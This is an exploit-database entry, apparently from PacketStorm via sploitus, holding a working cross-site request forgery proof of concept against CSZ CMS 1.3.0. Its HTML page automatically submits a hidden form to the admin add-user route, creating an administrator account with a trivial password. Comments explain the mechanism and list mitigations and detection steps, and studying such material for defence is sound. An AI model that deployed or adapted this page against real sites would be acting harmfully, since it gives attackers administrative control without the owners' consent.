## https://sploitus.com/exploit?id=PACKETSTORM:189609
# Exploit Title: CSZ CMS 1.3.0 - Cross Site Request Forgery (CSRF) (Add Admin)
    # Date: 2024-05-03
    # Exploit Author: Ahmet Ümit BAYRAM
    # Vendor Homepage: https://www.cszcms.com
    # Software Link:
    https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download
    # Version: latest
    # Tested on: MacOS
    
    
    ##################################### CSRF PoC
    #####################################
    
    <!DOCTYPE html>
    <html lang="en">
    <!--
      Proof-of-concept page for the cross-site request forgery described in the
      advisory header: when the page loads, the inline script builds a form of
      hidden inputs and submits it as a POST to the CMS "add user" admin route.

      Reviewer notes (defender's reading):
      * Every value in the request is fixed in this page; nothing in it is a
        per-session secret. The PoC therefore implies the route accepts the POST
        on the strength of the browser's session cookie alone. Confirm against
        the installed version.
      * Mitigation belongs on the server: require an unpredictable anti-CSRF
        token on state-changing admin routes, set the session cookie with a
        SameSite attribute, and validate the Origin / Referer header.
      * Detection: review POSTs to the add-user route whose Origin or Referer is
        not the CMS itself, and audit for unexpected accounts in privileged
        groups.
    -->
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CSRF PoC</title>
    </head>
    <body>
    
    <script>
    // Runs as soon as the parser reaches it; no click or other interaction is
    // needed for the request below to be sent.

    // Create a hidden form
    var form = document.createElement("form");
    form.setAttribute("method", "POST");
    // TARGETSITE is the author's placeholder for the CMS host. The path is the
    // admin route that creates a user.
    form.setAttribute("action", "http://TARGETSITE/admin/users/new/add");
    form.setAttribute("target", "_blank"); // Open in a new tab
    
    // Add form fields
    // Sample values chosen by the PoC author. group "1" is presumably the
    // administrator group, given the advisory title - confirm against the CMS.
    // Note the absence of any token field: the request is fully predictable.
    var fields = {
    name: "admin",
    email: "admin@admin.com",
    password: "pass",
    con_password: "pass",
    group: "1",
    pass_change: "yes",
    active: 1
    // Add other fields as needed
    };
    
    // Append fields to the form
    // One hidden <input> per own property; hasOwnProperty skips anything
    // inherited through the prototype chain. setAttribute stringifies the
    // numeric `active` value.
    for (var key in fields) {
    if (fields.hasOwnProperty(key)) {
    var input = document.createElement("input");
    input.setAttribute("type", "hidden");
    input.setAttribute("name", key);
    input.setAttribute("value", fields[key]);
    form.appendChild(input);
    }
    }
    
    // Add the form to the page
    // The form is attached to the document before it is submitted.
    document.body.appendChild(form);
    
    // Submit the form
    // Programmatic submit: the browser sends the POST and attaches whatever
    // cookies its SameSite policy allows for the target origin.
    form.submit();
    </script>
    
    </body>
    </html>
    
    ##################################### CSRF PoC Ended
    #####################################